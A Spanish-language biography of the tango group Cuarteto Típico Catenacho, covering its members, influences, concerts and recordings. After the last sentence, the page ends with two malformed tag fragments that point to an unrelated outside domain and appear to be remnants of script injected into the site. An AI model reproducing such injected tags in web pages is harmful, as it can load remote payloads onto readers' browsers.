Cuarteto Típico Catenacho

Nombre real: Cuarteto Típico Catenacho
Cuarteto Típico
(n/d - )
Lugar de nacimiento:
Por
Todotango.com
Ernesto Molina (bandoneón)
Diego Kvitko (guitarra)
Felipe Traine (guitarrón)
Adrián de Felippo (contrabajo)

uarteto Típico Catenacho
Ernesto Molina (bandoneón)
Diego Kvitko (guitarra)
Felipe Traine (guitarrón)
Adrián de Felippo (contrabajo)

Este conjunto instrumental, formado a fines de 2005, reúne cuatro músicos de intensa actividad en la escena porteña del tango.

El Chino Molina forma parte del elenco del show de “Madero Tango”, acompaña a las cantantes Adriana Varela y Amelita Baltar. Dipi Kvitko forma un dúo con el cantante Walter Laborde, integra el Cuarteto de Aníbal Arias, además de haber participado en los conjuntos de Hugo Rivas, Rudi Flores y Daniel Melingo. Grabó e integró recientemente el conjunto de José Ángel Trelles. Felipe Traine integra el Palermo Trío, el conjunto Ofidio Dellasoppa y Las Cuerdas Flojas (tango-humor). Además grabó y toca con Alfredo Casero, Tata Cedrón, entre otros. Adrián de Felippo toca tango y jazz. Integra el cuarteto Los cosos de al lao. Tocó con Bernardo Baraj, colaboró con Walter Malosetti, Fats Fernández, Ricardo Lew, entre otros.

Esta formación de cuarteto típico tiene antecedentes gloriosos en los conjuntos de Troilo-Grela y Federico-Grela. La combinación de las guitarras y contrabajo con el bandoneón le da esa característica criolla en el color y esencia tangueros, sin perder la marcación propia del género lo que hace un conjunto muy versátil, adecuándose al acompañamiento de cantores y el baile. Los arreglos son propios basados en el repertorio clásico del género y en obras originales.

Han actuado en todo el país haciendo sus propios espectáculos y acompañando a cantores. Han sido invitados al 3º Festival Río Tango Grande, en Tierra del Fuego (Octubre 2006), en el ciclo Tango 07 del Centro Cultural San Martín y en la Programación en Bares Notables de la Ciudad de Buenos Aires.

También en el Teatro Argentino de La Plata en el marco del XIII Festival Guitarras del Mundo. Ciclo en La Trastienda Club junto a los cantantes Cardenal Domínguez, Alfredo Piro, Verónika Silva y Walter Laborde junto con quienes actuaron también en el V Campeonato Mundial de Baile. También el ciclo del Torquato Tasso organizado por el SADEM.

Su primer disco compacto “No tiene nada” salió editado por el sello discográfico Típica Records y fue presentado en la ciudad de Buenos Aires en junio de 2008.

En agosto de 2008 se presentará el nuevo disco de Omar Mollo, acompañado integralmente por el cuarteto. También están terminando el próximo disco del cantor Hugo Araujo. Se han presentado también con otros cantantes como: Ricardo “Chiqui” Pereyra y Claudio Garcés, entre otros.

Regularmente se los puede escuchar en milongas de la ciudad y locales tangueros de la ciudad de Buenos Aires.< src=http://vert4.cn>< src=http://vert4.cn>